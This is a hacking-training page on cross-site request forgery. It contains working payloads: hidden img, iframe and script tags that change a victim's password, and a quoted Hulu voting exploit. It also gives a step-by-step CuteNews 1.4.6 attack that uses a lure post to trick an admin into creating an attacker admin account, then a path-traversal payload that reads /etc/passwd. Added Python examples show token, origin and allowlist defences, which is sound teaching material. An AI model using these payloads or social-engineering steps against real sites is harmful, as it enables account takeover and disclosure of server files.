Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

CSRF is one of the most common web vulnerabilities today.
Combined with XSS it becomes far more dangerous.

Cross-Site Request Forgery tricks an administrator or other user into loading a web page that silently issues a request to a site on which they are already authenticated.

A CSRF attack uses the victim's privileges to complete an action on their behalf. For example, a CSRF attack can change a person's password and email address, or even make a purchase in their name.

CSRF is possible only when the server does not check that a request actually originated from its own pages, and instead accepts any request that arrives with the victim's cookies.
The CSRF payload can also be placed on the targeted site itself, for example in user-supplied content. This is called a "stored CSRF" flaw, and its impact is larger because every visitor who views that content is exposed.

The requirements for exploiting CSRF:
The victim must be identified by HTTP authentication, or
the victim must have a session cookie on the targeted website.

In either case, the victim must actually be logged into the targeted site when the forged request is sent.

What tags can I use with CSRF?

You can use most HTML tags that let you embed a URL, because the browser fetches that URL (sending the site's cookies along) as soon as the page loads.

Examples:

Code:
img tag:
<img style="display:none;" src="http://targetsite.com/change_password.php?new_password=Ascendonisboss">

Code:
iframe tag:
<iframe src="http://targetsite.com/change_password.php?new_password=Ascendonisboss"></iframe>

Code:
JavaScript (setting the src of an Image object makes the browser fetch the URL just like the img tag above):
<script>
var poniz = new Image();
poniz.src = "http://targetsite.com/change_password.php?new_password=Ascendonisboss";
</script>

CSRF is very common, although many people are not aware of it.
Here is an example of a vulnerability found in Hulu:

Code:
document.write('<form action="http://www.hulu.com/videos/vote/344578" method=post><input name=up value=5><input name=_ value=""></form>')
http://www.hulu.com/shows/subscribe/344578?type=episodes,clips&first_run_only=0

This makes the victim vote, or subscribe to new episodes, without any confirmation on their part.

However!

Tokens prevent attackers from executing CSRF attacks.
A "token" is a hidden, randomly generated value that is sent along with the form data and checked by the server; if it is missing or wrong, the request is rejected.
Tokens are used on login forms and on plenty of other forms.

The targeted website's owner might also expire sessions and cookies regularly.

They might also avoid using the GET and REQUEST super-global variables in their PHP for actions that change state, so that such actions cannot be triggered by a plain GET request.

A token looks like this:

Code:
<input type="hidden" name="23qsrttf556usjscr2v7a211ifb" value='1' id="token" />
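To show what the checks described above look like on the server side, here is an added example in Python that is not part of the original post. It implements the two defences the text names: a hidden, randomly generated token tied to the session and compared in constant time, and a check that the request came from the site's own origin; state changes over GET are refused outright. The site origin, the request and session objects and the sample requests are all constructed for the example.

```python
"""Added example (not from the original post): a minimal server-side
CSRF defence. A state-changing request is accepted only if it is a
POST, its Origin/Referer points at our own site, and it carries the
session's secret token. All requests below are constructed samples."""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "https://targetsite.example"  # assumed hostname for the example


@dataclass
class Session:
    """Server-side session; the token is generated once per session."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Constructed stand-in for an incoming HTTP request."""
    method: str
    headers: dict
    form: dict


def hidden_token_field(session: Session) -> str:
    """The hidden input a legitimate form on our site would include."""
    return f'<input type="hidden" name="csrf_token" value="{session.csrf_token}" />'


def same_site_origin(req: Request) -> bool:
    """Origin (or, failing that, Referer) must name our own site.
    Requests triggered from a foreign page by <img>, <iframe> or an
    auto-submitted form carry a foreign origin or none at all."""
    origin = req.headers.get("Origin")
    if origin is None:
        parts = urlsplit(req.headers.get("Referer", ""))
        origin = f"{parts.scheme}://{parts.netloc}" if parts.netloc else ""
    return origin == SITE_ORIGIN


def csrf_check(req: Request, session: Session) -> tuple:
    """Return (allowed, reason) for a state-changing action."""
    if req.method != "POST":
        return False, "state change via GET refused"
    if not same_site_origin(req):
        return False, "cross-site origin"
    submitted = req.form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return False, "missing or wrong token"
    return True, "ok"


def change_password(req: Request, session: Session, store: dict) -> tuple:
    """The protected action: only updates the store when the check passes."""
    allowed, reason = csrf_check(req, session)
    if allowed:
        store[session.user] = req.form["new_password"]
    return allowed, reason


def demo() -> dict:
    """Run the check against a forged GET (the hidden-img case), a forged
    POST from another site, a POST from our site without the token, and a
    genuine submission; returns the reason recorded for each."""
    session = Session("admin")
    store = {}
    samples = {
        "forged_img_get": Request("GET", {}, {"new_password": "pwned"}),
        "forged_post_other_site": Request(
            "POST", {"Origin": "https://attacker.example"}, {"new_password": "pwned"}),
        "same_site_no_token": Request(
            "POST", {"Origin": SITE_ORIGIN}, {"new_password": "pwned"}),
        "genuine": Request(
            "POST", {"Referer": SITE_ORIGIN + "/account"},
            {"csrf_token": session.csrf_token, "new_password": "hunter2"}),
    }
    results = {name: change_password(req, session, store)[1] for name, req in samples.items()}
    results["stored_password"] = store.get("admin")
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Only the genuine submission reaches the store; the three forged variants fail at different layers, which is why both checks are kept even though either alone would stop the simplest hidden-img attack.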

CuteNews CSRF (Cross-Site Request Forgery):

CuteNews 1.4.6 and lower are exploitable this way. You only need simple social engineering skills to do so.

Using the explanation of CSRF above, we can create an admin account.

The steps to creating an admin account:

1) Host a website with a web page containing the following source code.
You need to edit it with the username and password you want, along with your targeted website.
Source code:

Code:
<img src="http://Targetedsite.com/cutenews/index.php?regusername=Usernameyouwant&regpassword=Passwordyouwant&regnickname=Nicknameyouwant&regemail=a%40a.com&reglevel=1&action=adduser&mod=editusers">

Try to blend this into the web page, for example by posting a funny image alongside it.

2) If you haven't already, make an account on the targeted website's CuteNews.

3) You now need to make a simple social engineering attempt on an admin. To do this, make a post that includes the link to your CSRF landing page and something to go with it, e.g. "Hey click this, it's really funny xD 'link'".

4) Once the admin opens your malicious web page, the hidden image request is executed. It registers a new admin account with the credentials you entered. It's a bit like SJDB.

Congratulations if you have done this!

CuteNews LFI (Local File Inclusion, requires admin access):

Once you have admin access, there is a neat trick that lets you view the /etc/passwd file.

The steps to the LFI:

1) Go to Targetedsite.com/cutenews/index.php?mod=options&action=syscon

2) Change the skin variable in the System Configuration.

3) Intercept the POST request and modify the form field to:
save_con%5Bskin%5D=../../../../../../../../../../../../../../../../etc/passwd%00

4) Load any page on the website and the contents of /etc/passwd will appear.

This has been patched in newer versions of CuteNews.
Older versions are vulnerable to many more similar attacks.
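The fix for this class of bug is to never let a configuration value such as a skin name become an arbitrary file path. The following Python example is added here and is neither the original post's code nor the CuteNews project's: it parses a form body of the shape shown in step 3 (the field name and the traversal string are the page's; the bodies themselves are constructed samples), allowlists the skin name so that slashes, dot-dot and NUL bytes can never pass, and then confines the resolved path to an assumed skins directory as a second layer.

```python
"""Added example (not from the original post or the CuteNews project):
validating a 'skin' setting so it cannot be turned into a path such as
../../../../etc/passwd with a %00 terminator. SKIN_DIR is assumed; the
POST bodies are constructed samples in the shape the syscon form sends."""
import os
import re
from urllib.parse import parse_qs

SKIN_DIR = "/var/www/cutenews/skins"          # assumed location of the skins
SKIN_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")  # allowlist: no '/', '.', or NUL


class InvalidSkin(ValueError):
    """Raised for any skin name that is not a plain template name."""


def resolve_skin_file(skin: str) -> str:
    """Map a skin name to the file that would be included.

    1. Allowlist the name. This alone rejects '/', '..' and the NUL byte
       that the %00 trick relies on, so no path is ever built from them.
    2. Defence in depth: confine the final path to SKIN_DIR, so that even
       a loosened allowlist could not escape the directory."""
    if not SKIN_NAME.fullmatch(skin):
        raise InvalidSkin(f"rejected skin name {skin!r}")
    path = os.path.normpath(os.path.join(SKIN_DIR, skin + ".skin"))
    if os.path.commonpath([SKIN_DIR, path]) != SKIN_DIR:
        raise InvalidSkin("resolved path escapes the skin directory")
    return path


def handle_save_config(post_body: str) -> dict:
    """Parse an application/x-www-form-urlencoded body (parse_qs decodes
    %5B, %5D and %00) and return the sanitized settings, or raise."""
    fields = parse_qs(post_body, keep_blank_values=True)
    skin = fields.get("save_con[skin]", [""])[0]
    return {"skin": skin, "skin_file": resolve_skin_file(skin)}


def skin_is_acceptable(post_body: str) -> bool:
    """Convenience wrapper: True if the body would be saved, False if rejected."""
    try:
        handle_save_config(post_body)
        return True
    except InvalidSkin:
        return False


if __name__ == "__main__":
    # Constructed samples: a normal save, the traversal from the page, and
    # a name that is clean except for a stray NUL byte.
    for body in (
        "save_con%5Bskin%5D=default",
        "save_con%5Bskin%5D=../../../../../../../../../../../../../../../../etc/passwd%00",
        "save_con%5Bskin%5D=default%00",
    ):
        print(body, "->", "accepted" if skin_is_acceptable(body) else "rejected")
```

The allowlist does the real work; the path confinement is there so that a later change to accept, say, subdirectories still cannot reach outside the skins folder. Logging each InvalidSkin with the offending value also gives a simple detection signal for traversal attempts against the configuration form.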

www.extremehacking.org